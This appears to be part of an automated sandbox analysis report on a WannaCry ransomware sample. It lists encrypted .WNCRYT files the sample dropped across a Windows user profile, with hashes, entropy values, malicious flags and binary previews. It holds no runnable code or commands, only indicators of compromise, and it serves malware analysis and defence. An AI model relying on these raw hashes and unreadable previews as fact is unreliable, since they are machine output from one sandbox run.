                                Preview:WANACRY!.......<]..f.M!a..A.....+...Q.+.x`....j...\.|;.L...8...L..C.._H.^...6&......... =.......E....l..Y.Z......%...".h.......I........i<..e......I.L7.y...H.94W...r7qo.#..G.b....n'z)7...M.q..,h..!.5..j.bM......L<{.g.6C..B...M..xpw.]..6.......B?..p.....!.tF..n....X........X.X.5#.....S.-4...R..._.........V....y.;6..R..k.],..p.V.:.........5....gm......F...X.....b...j.CU..S...m.,e.......z.|..ua~.P.$.5......9Q.>....li...x.'.c..6..~../..U..'...4w......[f?,..V.p..Ds.@'.:c.V.._{..+..0..w..Q.l|.=i.9.uqq..../.1.../..b..:q...n...d1....YEo~S..#...-...V.....W.J....2Za.X..k~...I.). .Wl>..w..........u.f..|V.a..U.(70|0...M.tX..Z.}.8..h...~.@M..;.e*...y.....g...T..tH..M@.5.e.....U.......j./^...:.d}17.aY9...x......<.)..B....C.Y.^/w.&[.E.!.........bU]x.p#e.T.....x..U.Qp&5b.........Z.Z..=.8..j]......=.?i.....`.....K.>*.U..."..&..u...6p....D.\....\o. z......L..,m.l..)#N<.... ~....]7...-.`.Q..........@)Y...w...............>]./...m`.Edd....?T."l}.D.<.._f.....

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\70af9816.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9736
                                Entropy (8bit):7.98117084151071
                                Encrypted:false
                                SSDEEP:192:G8lrzfphOHjjeAqRivkTg2kH1sSUeSBWSs9i3XJUCtodocNY:Nrzfvkju3g2kH1aeSoSd3XJqoAY
                                MD5:8C860A81B1BCD0271DF7E7E5A48954CF
                                SHA1:F940B7BE4ADFDB833051BE854A203B3AEEE4B3C0
                                SHA-256:A0052C3DF627C14CB024DBF9FE05407DF86958CD732A2BAB966AF620FE48DD84
                                SHA-512:CC1388EDA52B4B4E59DE7FC6BFB978DABA0483463958FCE36E35656D7950D83FBFCC0AA2B0EEF4CE002059D57882A2B61FE28D19AE7D24735CB9686B9B222F6B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......k5..N.]..E..}.j...h<...D.9f..ZTs.....,..L.....#......X..V<e.1.. sq.-.IG...x..T...p.5.l.j... ......%P.50.w..8.<..&..lz..*....BQ!$..29=4]2(......).Y...%..C]....j.K..VD'.%Y.n...(g.0\XTr.7...i7O.b.^.;.1..v..w........j..a).e..m84....(......<..;NW2..l.u.....$........!...D.....P8<..c3.[.Z.......b.....a.6-.T.5.....}...<...I.t.......b.5...sP..-....z.......v.NQ.+..P.6.Dh2...T./...u...@P../6=.?...zY.(....fc..k...1.a.$.2!5.#...W.....&.i\.3@.IX.B...9.^o..}.##p.Hp.}...<k./i.&.p.)aM.......7..F.GF.N.u.B.u!R..."[L..d..e ./.@.C..t0k.....V.../..........i*BK..8.....S......l.."..UT9Vec.O.;.T.....0r......}.*...+..%4...b:./...j.....a.*.:.u\En.[.....6#....\.f....a...i.x.ox.U........g|[..)J8:.......l..w.r....9.c.?G#.?g...M.s.jV......d.(..oo.FN..%.Hh..C..^.....2u`...9..^.~S.A.d.E.....D.L>...RhQ ..e|.....L........K.4/...:.(z.._'}M...V.-..x..4..|......I.?....v.l>u../.Z....%J; TOD...G.S..J..x.XN.Y./Zk...5x[.V.T....t..._.o...y:.<.s..^..*.e.cZ.....0.e|..h-.G.<.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\8fce0f3.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4552
                                Entropy (8bit):7.950845170731367
                                Encrypted:false
                                SSDEEP:96:oKpxEQ2L7p+nFKt9Rmb3I+2oPAPPanmnW1jQgi2kT7idtTGpIEstJRAsJACny:BpqQ2L7p+Fw98b3HF46n8AQBwislpACy
                                MD5:5B25EBEA404626C78B60F9291C3EC131
                                SHA1:11F6CF9C39CC28D64BAE585240B1275C9762FB1C
                                SHA-256:94671D5C0B5B4FBEF588A4F8A611B57FA17B2B5EFA5D8808256DD61A6C88F15E
                                SHA-512:C908A3A1358EA3B2884E0686840CF5A05C7B943BC316C9C4D00B5067570457647C5BC9F4D537ADE5BDFF45D0A4B3F3A268F941F603D3946951B266895CF5FB9D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......k...*...{`|..jD... ..P{..k..sY...K.....=Tbp..d..#iP#.J.+.n...T[...9..$...P..4....Hl!.fY/..^...v.d..u.4....ncuRb.pWj.EB.]>^..zB|.d..y.?..?l...,z.........$..D..p..x`..&t..S....J..?...Bd0.&)..0.....`.iZ.w..9\.\eT.,..Q..#.h.$.!.A.M...q.X............C............>.......3..?d.........<?)H^..e,.L....Y..P...{S..)...`:..{.XF....>x.Y...f2..{....9'_.GgE6.....H...)m....P.S.w....t.8..C..%.~}..tM......E.<...6u9......h{.\.P.......l...J.9K..y.7.d,.....x.b.#...F.w.C.._j.....o....E......&.Q....{......l..e.9.&.d!8.?r.k..?=..s.o<I.e\V..<o?Oe.0..%.9.C.~@J..b.t4..n|Zu%..}$s.+lRR...O.J8...lS..w2..V<y.........*.'.[6I...._.a=....>......kWC....XLU-.+..Y........(.?B.K*..r...7.B...4D...+.;.D.v..&.4.P.J<.)..O.t....HZ...........g.6.M........4.Z....xRY.|.s...0.3D+e{.M2d..2.......K..n.@.An..P....{..}...6......$.s...,.h1[2m.T.q\O..B......=Q.L..Q..mKBOUT..-.9....r.L\+.y]..~v.7..\....>Gf..r...z.K......0.s...W..q..c"...Q..E...........2}*..@..v.d.....*....

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2097432
                                Entropy (8bit):7.999914152945239
                                Encrypted:true
                                SSDEEP:49152:Qyjaud17ReH6PzWBKRgdsrmC9WxSzhFFOhszM/SphfHD:fmepReiqKRgdsr19fzhFFOhsY/sL
                                MD5:DED44FFCE27A8741FE6D0AF575E39B2C
                                SHA1:C18CB4DD69877DF6142386B0D68C61155783C6DA
                                SHA-256:14989F8A4B5C5A4B5210A7ECABDF3F21CF313413D98D465FB51CB51FB849B547
                                SHA-512:B8FEEEB5A907ADBEE70102691B51B188E0051FAF2C91A4AFF6F521249E12705FDFF15856E68872C7EA46B67E1E93B416D092CA42AF3A4CE33B72325D6A5868D2
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........q1yztKf..U.+b...H)...+...Vj.|c.<v.7...=..:F.Lu.Z...%.=#4....P..].M.I~LvO....X..7V.}h......L..%e!.*-....=.5.sG..)A_..............o...t#..F..C..=....7sX..==.<._..7k...o..m.r..e...f.Rhg8...DikI..........@f..G..,.X.a..yG..........x........ .....B..@..8K...;..S.B..[:..^........o.`.v.g...H....I..e...ID9k.4.\.J@..;...[..l.j.o....".plP.Z........z..8.]......{.uR..&|..%,[1.M;....@....N.x......6@.p.F.{.9.....W{.}.../.'.,.U._.@..~"9............%..Bm2?.Vj._3...\^.....6.gj..=.Dm..0..).._.n0..i...te.L.."...M.!....A>q.:..D.=.w..X..e....$Q.....GIL.oEO<.._..P)4_...kL..0...KA._.6?.l.<3...RF..C...g.A.UV....9pQ"....6*.9A.p..}........N..F./.S..SX.......0H...6(*o......ZM...p.....d..^...bH.0.F..\....F..(.....T.)6.e..:7[.....>{~.W..K..*4.<...........].."..f ..<A........".R.....9!V...f.o..?K... R..z....&..1.s-..I...\....O...y..d].....~.......!.....@..k.Q....K`.>K!..X.b.n.p....x.0....!.k^........LeV........'3..u..M....P.w...M:M.

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2680
                                Entropy (8bit):7.916048529659949
                                Encrypted:false
                                SSDEEP:48:bkRm7VQBnYQ0aM7VFNMwKX603MGOw0L43tu7MTt8E+lMLU2Hk2FDnE2O7L2JE:oRmJQ5Y2mVBGFOw08dR8E+llaBW2OHt
                                MD5:D0A0B0975A5726E0D7C71C5E99064418
                                SHA1:F3B5CDF96778BC8EA02922443FC27DE5C35B22F8
                                SHA-256:CCC5EBE0DCB92F658B23B86304D00D7CA34710AC22B67668DF5F6248AF5104F4
                                SHA-512:504A24D3A99C464F530AD0B265F154119E1EB26296B23ADF1E9133AF7ECCBDBE5CBC73E21C5C637E57FA7DDDA145337B4A0414E3C930607820E490EEE48818B8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....p..qp..}iQr..U.w..`...v......a....3Rn..7l...MOq.n..s..1.@U.......f..|..<.2.....p._>Q..ML*88M.. ...>..^..h.d.^4.FJ.?2.!...-im..:5C......z..]..72u.K).}z...I....UE~.p._.W.....&M.`. .;F[...;..y...'...M.W.;.|..,...7.b...D.a.lYno..U.G[...[!......Y.........Y&.f..fW..1D..p...|.V[..h..?.h..v'9.u.S........Z..^....u..V.c5.yg.o.+K....vdRN.}.3.wQ....i).M.f.a..Jz. .....(.]3.$D...*:.l.....'O..1.q........'Z^... ".X..f.'..../..2(.Q.'l.......[..iP.AOR.9...P..b....(%?........4`...6........n.........>........=!)..Y.h..A...TC#6rW...2..3.......Np_=.wFTtj;<.# E.p...S.../8..j.A.....;..d..#......2..D...?Y.d.....4)<n\.@.kCz..s..7.qLW?-#..@C.f.....{z......_..._..[...F.no..T& .6}.>........=<....X..A ..i'yc.o..t....&......Z...b.(b#!...k@~Y.s]8R.@.a...GK...Zi.C.sR.p,D.=[.W.<...........w.M|wC:Mj-......./..3@..x..N;.+.^..f.F3A...Q.......TI...B..%..vN.J.&.^....^.\..%>j.......F7y..5.D.d.`.[..b...-.>.....F."...c.J.V....S.t'../8.i..51d...H6....,B!.=1[..

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1912
                                Entropy (8bit):7.907305897395018
                                Encrypted:false
                                SSDEEP:48:bkmbwLPKUfKD2kf11DyUPeG34fkias4E9KXRG:orKGKf11WUPFAn4QAo
                                MD5:151B48F8DC57947686ED3C24203A2723
                                SHA1:2D8524187FD5B02C6AC5BE8F0D7E784A8E968C45
                                SHA-256:0B00029C979C35AF80235E41C66E9E3AF97EC245151B7543640AF36D6022E29C
                                SHA-512:4C13C0C473955DC0EF8C4ADC639846434FD3EEA0E0F466A4F2A7001839D64914D6E3F2CDCDAD4DD02DD53C7053A013CBF702B280FF3FF6C2A2C840D6FB5477D9
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....d...../a.<.+S..w.h..0...{.O...1....}..)...t-3x..i.0t*._.$.T...^..V..Mh...<.....)@..!...,1m..h....A~...OX.%..s..(<.J.,.c..}../.=.mw..`....,=.V.I........`C....`.xM.w..5X..YJ.G_.v.d.Y.....BdF.>.K..@.T...,...*.[.....X..8....f.:LO.....{....*...0......[.......{;sn..v*[$1%......h?.!1..x:..\5....<..J6.}..D.....F..".l.7.o.........h.@'.....`..d.4.S....o...j_-&/(%e..T......S....d....7zN*...vH.."?...N....{=h.y/E..e].v....fT..-.....G@.;...@T..q6vh...p..g{...U.I4.[.F.5..9.VD...N.`..'.....#......#...#....L@<.u......NS..".T.....V&X..d.L.u.~j...........\.>../]..@.c..O.>.............\.../..,5xL.v.`d.].)..Gl.L..w~...F..s9Et......].......+>.....R..z..Z...i..%*....1b.....j..$.o...^.....p.....,..IDs...uY..G.....)3.`.....;.H....[.y....4<.pC...*..B.4....4..~z.y..5.GE..-r....$'E..(.W...Y!_....[...".qR..l.../.$.Y...d.n1".......G.....0.~S,.b...|.:...~.............?......r.wV...N..2ebR.hz(..Ry.. `.....X4Zeho..!0.."..^..s.}V.3 ..L8Iqj.g

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2696
                                Entropy (8bit):7.9280485720745775
                                Encrypted:false
                                SSDEEP:48:bkneGi+xT2QcipjnmoVx4S/dXrcgEael1rxxqnx7qWrM2mDEwUHv0yumZZ1:o6+UQVFnFrcVllBenDrxmNAKS1
                                MD5:79D23BA9A5329F6F96EE9B314F41B135
                                SHA1:EA0E1FAD303C9D85333B3F9D60029FE476C2755A
                                SHA-256:ECA8AECF26E1786D5D09EE1A6BC2FE4F0D8CEE4ED4A4D7E267320EE44DD6BBA8
                                SHA-512:EFBEC37815727DAD76E5A6EF4F49C292B25EB18B4C6458542322DA6490CD8FCBCF8E6BF855B265214294672A5F188677E927C199AE64BE716B92AAF5853042D0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......%..K...>g\.5N...~..o..T.H..k.H...*.X{....:.d....7_.X.a.....^20$..L..Fb.R.IZ..Xh.~1@h.h(.....Z..;k.v.M...V..>f..32f....6... ......_QP!......,...W.fC..{#...B.<..B5.(....q...X..6.}..\..D......s... ...h27.CL.......M.D......ENE^.7Z..Y....K..H.5..;.....a.......H....Nr.~5.m..R..2.I...k.U.....ekg....R1-....u9#).3c..0fu....ZF..3.B.4INKU........p=......?..7|.....Z'.VF.VN.;.o7..9e..p_..9...-.,.+%5.....8..E.r.........T.m#a..<[...A5......}.:fL..Ev.[.R.J..k".....]..y..z._..rk.aoD.x.y..3...~..u7.$...+.,......_....F...........Z...@..G.d.K....} 89.PL..l/.1........g.((n..$...<.$H._{..$..i...c.h.=.3`....Y....Tq.j....7...]....j..@Xd3.k........HZ....$W.G...u.tck..=..o.."D..nTN~:p.R.9.@.J.m.:..E.x.....X.......<d.%K9.E............B\...O#.|C=.`xXUP.......jo...#.....t.....C...}..B..w1.pBa....5...R.......Y)i.&.............=...{n8%H...sT...c.S.K../..J....`.]...b.8.&o..B...8...}.....'N2*QD....Q...-.{.*X..H.....a2.....[.s@...l....$.D...}......$.mP

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1864
                                Entropy (8bit):7.902832488308295
                                Encrypted:false
                                SSDEEP:48:bkoaI9ylmVpkH/VXZdHvA5kPPLeiDKBIPmQ/EC+tC/TjgjFTx:oocl+oVpYkHL3DgA/KteHgZx
                                MD5:EE5201BF85AF2FA2B7798BE3BE927A65
                                SHA1:98C92B8DA36AFB0EB6B21D1DFB7B33109E281EB5
                                SHA-256:7DF3645F5414E1D7B3F591EA73FCEF03D7CA7B95D0C7BA4924A20065774E8E9B
                                SHA-512:AFC8FD796034F34D7FB1FEB87F58CB69C65D6855893B8825EE3D5F5320476ECA658CBB33ED5F3EA80FE8316AF222D548C15EF1230515C5A7F6960A2822FD3FC5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....o..TH.p...Q..>..>.`..0.,...(.......Z.-...i.....RFWr.a.B........=.P..v.7T...sz;O..Ts..s..........I1...m.....m...zx.N.7..RTb.m+(...(?a|..]y(..'.0....^..6.w#...e\.].>D.S|.....(x.R...........(ux..y.....6vS.C.....ZGZx..#.....s.&i[.z.5%..Y..8..K.".....)..........W[.......s2.z.m~.. ..$K....X...A...lj...RE.,7....L.Vm.9.QD?$.}. ?|...9...=.V.'uz.n..Z...D..........._}....TP`..e..y\.....(.Y.....9.6....w.N.....l.J.@.........*gu...EQ..R.>.....b."#b......I(...3~.!...'C...{8..KSo..j........\......x.....O.....1Q....A..D.5>D.............&.....Y...(.V.!......4".....!.$.C5.~..a..K..r(..b...w.*..H...`....R.jC.T....'[..N].&../.'.....o.;.i,.... ........"<]...Jf..f=..JW`6...kS.s....v..L.".~{0ID.#.D.z.m.GU.Zl.4...N.2.. ".._.O..,.. ....k2-............*f...Gk....a2..hL...W.....{*B%...z&..wE.G...>KY.1.d..C..H~.T.......4L.....;..S..&.b.Z<.z.p.V{v..X.#0..\iZ.....{..4....wM....):8v.B.MU...U,3"4H..2....."..].;|..+.S.^...%r...........5..g.7e.h.c1........

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1848
                                Entropy (8bit):7.9017562132238695
                                Encrypted:false
                                SSDEEP:48:bklkTa3CTTzhGWwy7DF26tUJIG2fEP0Q23isywu95Y:oy+3KN2y7DF2+Uf0vAY
                                MD5:132148664DF1B853F1FE24E7B3C401B2
                                SHA1:32B80B91AE56AF8C3947AE6AE415F5439D7BCDB1
                                SHA-256:C6D291BCDD98586771F7E03AE30271FF4C1068A6E913E3E906A47DBE31813AA7
                                SHA-512:C6C07926396BA9160C448B06BB5212997BFDA74A3FE88EB3D3F850324C2E5E1EE89DC286D1A522A072A9847C0EB00D36D29D2ED1600515F7C21E494B5D1476DD
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....pO....-.J=G.A....A.m..@N..c.1.xY...{..g,u.#&^.^`/.;...A..scE..T.....4...../d....3....f..(.........T~ k..J.v.8..(5....1:_....].JX..GJ].x..a.4N....>.wv8.....0...N,#._(k....{..H..*.P5..X.!u2...H.@.;..8u....v..C[?W..b.n6.....qN.........8".[.."&4............?.u.$...7...bi..pN# .C..|.}..xd.+..w'.i.jw.>..K.o..G...N..p.92<vv...U..... .E.......b...@+>........Z*K9"D.]....;0..I....*...q...J.aR.r..ET..N..2:..X...<.....C.i9...z.$..]."rZ...\....q...]y<.....R.f.["...'>n..dN-..^ ..,k{*v2...>....v*.K.go..... .,W.M".~.U^.......$]...z1l.ie.A./.")......L..c.S...w:.Z-...6DA.u(....~.K[X;.....T.3VK.N...x..N_...pT..q.kQp.._..d*p.G..0...t...dJ.......a...Mpg..........f/R.+..s..[*.Wd...G6.........`....'.....>.qL..Y@.A`...|;....&.k..I..r.......0M^....fj...#...;.%..&.wA..j..)...=b.T.zA.rQ.Fn....".<..Z:..L!.v..Vk..&..M..~/.s.E...oXo`PRh....]>7S..... 3......;.E.m...6.S9!...ay>.\E...|{.?...{...;]..j..9....' .U4Yw.#..H..c...Y....L.. .......-%*..:I...X..

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1400
                                Entropy (8bit):7.856185793609136
                                Encrypted:false
                                SSDEEP:24:bkR8qI3wplsIV9Z4LG4B1rGdZXvktQ8sixHJfHBJjpZWSuvVbQEsRsfd4FQOQ7fR:bkR9I3wYI7L4nKgLBJ1ZWbvVbQpsfyF2
                                MD5:889E9BCDD363B741053DF4AB12160EB6
                                SHA1:BE2C01A7B4921DF529C4B7ECC143BC11F19926C1
                                SHA-256:556FD9E1C95BB2094D284446371CFFFA55DF4ED8B911447D98E807FE2B302435
                                SHA-512:78B89B59A65315C9FBBA16C7CF90D1020E959C333FC5B08FE6C22C577D931AE08E3096A8C9A7C7ED9AD5CC390D22B2294B14F41970B263AE5A77B0669FA9F120
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....W.41..J.6;..&..#.....U...s...U#.x.7.*.Tg.8..}h.,.F...D.Jt6...K...i.I.....'x..j\K4{M..?.....mk...E.K.^....s.sf"/D...5~..b....5.....J......w...7....a.>Nx.q5A.I...{."..YO..{.*..#..JJ..3KPOb.&R.~....b....d.x...m.8\F...w3f.....V*B...x-w...(Nc.}..]T.a......Y........|.0.bH4.P....&.8>}P]LR.&.6..3r...h-.}s.:Q..R...,.\.=.+.D...J.W..15....+T.....c..KD.G..M.:f..#@[..J.<.....v9..E.6.BWi.S..=..9.{..p........Q...._.g.vZ..+.....5.......H.N.z.....;.y...g.eO|.InS....j.j..|<.-/s..Jz......UeG.B._.[...N.6p...9......n...Y'...(r......h..W.3Y..b...&..F0(......T..=......0p~@c..my......k.)...2..\.>.).X.........A.T9z..p..+lV.....R{.b...2....kMCR.:..m.R.\Z.......o..,W...P..w..T.r.....fR...j...&.#.d...j............y...C.c..UV(.... .].\.m.....p ..O..|........N.M..%.u'A..hgz..:.....e..~..I...<5.pJxk.<,.n.3...I.79.*T....j.._..F?V/.O.S>..U/$./.Ifn.'.U.=F....~i...4.4..,jY.F'.....]..... .l.t...L5@6...eu'{D.j..1.;..cx......l.8}.!.^....*..3..L...wb5..oN.e.......J.

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1736
                                Entropy (8bit):7.89476478132647
                                Encrypted:false
                                SSDEEP:48:bklKgEHF9rXw/ZX0vD5mEl76CtzWVfoRDKR:olKlKKbQElMfoi
                                MD5:77B7733B44F89B7B113C3DEA713BDE82
                                SHA1:F90618A0BF55DC7918AD7CD085A23BD69BCF6D1C
                                SHA-256:06407ECB3F79C7F6CB89E6EF8EE85A232DB929E06C492432EB4609F03DF56C0D
                                SHA-512:010D433CFEFCB17D6D06AB43825256F218BD18F2B4A3CECB11BD26865E83959752DC89A5B96BF0780EE335016E484C35D3D3B737D39D14D2606A1CF9D0D44C49
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....w...#w...-...z.+.....,....;/(igJ-.w..}1C..V.f......^.......<7t6./...Zj..<_.....Nh..H..;1!..#Q....=..<.....[.]n`...R..9M.U.Z...<.F...\(F.-V..U.;....KF.....N.4C..*....(......qn.cF..xf+..p>..,.K.S#..\...R...=....>W.?.xH. ;<...>.;..Q...0c. .....Pz`..............]?N!.G|.....y:...y?r.Y.>.....t}.V#:.l...}.j.*+..8...h.._-Y.t......?...n..,...6s...\2..j..}....r..V..s2m..EP..vJ..]..D....+.....J.U@D:e......4..R....=^..Y|:...].>..........=O.\?.m..b.#.. `-....2....R@.......L.rd.Ue^.J1Z.{SpI.....K....f.[2............I.A...e.R..#.f...B.d.a..K......k.....{..>.Z.: .0..x.....x():.s...4..q.'q.....#..J.n.K'.8E. ......X..K..a.I..........g....s.......j.].t.g.^.Y.n......}N.`......./.h..{0.B.X.<.&.T.I7d.~q.M,A.hy.".j"...|.m.2...I%?.,.z.K...S..).......o....S.$0._m.ll."..*.C..-....4....qIcA...'.....)..0g..9......<.p..w6..=-J.3n..q..*M.TVC......Qg.....T.AC..].>S^-Q.Si_.1..=.K..1...^...]A.Z...P3.MyE...6H.e.e....p.,....I..<...../...i........pTP.........K&..

                                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1352
                                Entropy (8bit):7.861858482299786
                                Encrypted:false
                                SSDEEP:24:bkW4fNZT5QePu97LHODg1NyA8GeuPW4FfVigk5ihlmzD+sRUQtcaz:bkW4fN91i7HppW4/igk5slcDRU8P
                                MD5:3FAF981B8ACDD8E7BD36AC614C9C01F2
                                SHA1:1ED67C80035251906E737C87474089D3D3E924AD
                                SHA-256:554A3A151ACE6B835A0D8DC66454C9568B2D426E2247C704BF97A9B9765C49FA
                                SHA-512:5E94561B8E23A74E3EFA5DB741A51AE0206537DD496FB7E4AC69614367841DD65657DEC9F4353A8037D7B2678FBCE336508DEF289397444CA09433AADDD84F81
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!................-QFg...v..+>....KJ.Ss&..2.3......7.............g.}.C..y.1.......E...u.i./.o....G....|.o.?8G.F..}..u.nL..~...M....%Q..{xa.T....k...]U.......V.4..u<.87}..ss....d.gMm9..vZ8...........~.H...,C.i&-:.S..uQ.....[a.}...;T.i.:....k.%C..\......$........1|.YPs.z.EP_.p.T.M.......l..y=R..O?.5.|.v.V.....07...$`.0.l...#XG..[..gXn...zJZ..jYD[..k.DO..7.`.v.x..<..t..A[.qE...?}....../[L.r......m..nP.^9. .,..,.....Xg..y."66. .1.....b. .4.^....j.1!>.}a?c&.'.<...5lL....+...I/*~.^..|.9<7....O.$....^...Z....&g.6...&KQ]...8....'Fm..9.R..'...D........0.c..`n..h....3..#X&X.H....0..*. .'....t'^h..'..4.....^.-....>s.[(=8.1w@.Na.M.......3.t..LS4..%.....J..}....Z.a$.....n.....k.$.:'1..,eS..E.[hf.SF..L..p.....k^.......|.X....U.cw.+K.uE-.....Z,sZ...Hx..(.../..#..saM.T%d.K..v^./.%.7....;Q...N.w[......|g7.......L.<e..+j....e..{c.O...D.x...7....tND.x.....>`E|...1.....'...d.v!....=2.AC......).a.`.5271.H...S.....vp..O"....m}s.U.Q..I.T.h..j.jRw.3

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask01_20_08_51_44_0048.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.7757870994417235
                                Encrypted:false
                                SSDEEP:24:bki7H1dB1x1jGeUooX73UpiZaLVKk1uSK34uCfD:bki7Hh1re733+VKk1uSK34uCfD
                                MD5:BADD0291A044EC512384BB9C59B68BAF
                                SHA1:5CD894B88CB2DA66E4051546C82A3AF570130261
                                SHA-256:BD14848E916CECBC6F9EA4888A4CE9B81363D709B5666348AE4C012ABAD7C254
                                SHA-512:E679CDEF1FE6364A51CE277ECFBC5A7627BFD5F463500D2B39CFF162865ED405DD14D9F27BEFA09ABE781E82A74DF65424B6728030F6BE441EFEA7DC2BD83279
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....o..qv>B~T......._.6.A..C?...4./Qs...f.q.....;..C/.K......P.kn.yp.0.......yc..TD....X..0.)t......e.p Z.a......{.O8X~d.....5........Ja...w.,...Y1?......'r....p...s... F.6z\$.....&.T.C...../w..!..Oh....#.......',.=..>..a...E....=.$.z.l.t......0.<V....C...........IM.K2..W.Rl.._.,O^.......O&~..... .>....._...=..1@.Q...T.M..3...Q.e...'.ED.&..4......j.........|Ez..$....e...(...Wy..8..:r0.>^........"./...~......).@B.,.z..i.es...z[U.NOq&:....+..<zj..C....${b..,....(..H...|a.<....`.,.r.C)...7...1.r..k..{...P....EO...j....4...4.........5.s.>e........=I.."...8.#...,...J..8Vi'.......<...~..... jS....v.!....SG^.@.8..m..H.....S....j.B...-...W.w$....6.j.d..M.9...h.H...7.....Z{.v..1.....u.R}".]......|R...$..q.>|v.:..'k.'.D.g.....|.a.u......y../.N}.......{L....(F..f.p..J...4w.....\.,.D...p.......{.....=<r_..........w.

                                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask01_31_16_11_15_2726.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):872
                                Entropy (8bit):7.755257602010676
                                Encrypted:false
                                SSDEEP:24:bk9s0x1PftdBLrq+/H7Jza+dcZizU56lt102zF0:bk1vtC+/bJzXcOnJ0
                                MD5:884CDFCA44F2E387388B839B2048A072
                                SHA1:1C1D99645D9ECFD855DFD562C2FFF49025F1439C
                                SHA-256:1E20345BE261FB0EFC8D177ED7B330ED8642FFF052BCB5E9A3D0EFCF1EDFE4F2
                                SHA-512:EACCBCF3E0E94999651A30BA6E90326AF447B4608D27A654938DFCFB7F4B0AAEC568A9DCEF1892C8B4551B4CDA03420086077009E04D55E9839EB83E31ECC5B0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....UNPo[].I....,_7.n....V.]..3.......O.....gA..$...S[..p...sIsmK.....;~..&h.c..%.F(.?......%..]..q.....{.oUz.?ce.A.`7g.,.#..............C.A..^E.P.5x.&...@@..c.s..4...+fK......+.....Q1....{.4......&...4.Bk..).....O.4..........f...x[.(?.....C..........@...E).&......g....#...kyH..L..Y...:....gM.c3..<..d..j.tW.:..6.'^V.@.....~.i........P.J/...........^..-H0.CU../k...dEz4....+^D...MD.[.qZm^...3..........g'.........o.e.._!..<......s....Z....&..Gf.5T....^....b...?{.+...V......$.F.!D)b...As.>q......K..^..|......N..P.t.%.i.1(.c3C.....!.'M...d......@.+l....-..9.^.#lyPr..../...*G.....,.......Q;)CN.;..y...........)...R.P....1k.i.p+.Z%.Om.8.i......./....W |l=..=..9"(........6.rl.A....6.(..hbC..-......G.j.x..X@..b).&$..H-....I..C7.M....G.......Jk....Tl.)G..k..T......R.."............r.....T..By.....WdEg...

